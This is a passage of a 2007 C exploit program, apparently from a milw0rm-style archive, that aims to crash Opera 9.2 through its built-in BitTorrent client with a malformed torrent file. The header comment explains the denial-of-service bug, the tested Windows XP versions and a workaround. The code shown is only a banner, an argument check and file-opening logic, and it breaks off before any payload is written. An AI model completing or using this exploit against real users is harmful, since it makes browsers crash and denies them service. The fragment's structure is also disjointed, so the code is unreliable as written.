* Created Date :April 23 2007
*
* Credits go to n00b for finding this vulnerability and writing p0c.
* Moderator of http://igniteds.net
*
* 0pera 9.2 torrent file remote dos exploit.
*
* opera has its own bit torrent client with-in the web browser
* it is possible to crash opera with a malformed torrent file
* causing denial of service to legitimate users..Opera will
* use 100% cpu till the inevitable happens..Which will be a crash
* To fix this problem disable the bitorrent with in opera..
*
* Tested : win xp service pack 1 and 2
*
* I wasn't able to catch any debugging info I'm afraid maybe some one
* else can give it a go.
*
* All i was able to get from drwatson pmsl was.
************************************************************************
printf("n *************************************************");
printf("n * Opera torrent file dos exploit by n00b *");
printf("n *************************************************");
printf("n * Shouts to every one at milw0rm *");
printf("n *************************************************");
printf("n * Special thanks to str0ke *");
printf("n * *");
printf("n * Date :Aprill 23 2007 *");
printf("n *************************************************");
printf("n * CREDITS TO n00b FOR FINDING THIS BUG *");
printf("n *************************************************");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("nFuck some thing went wrong :D");
exit(1);
}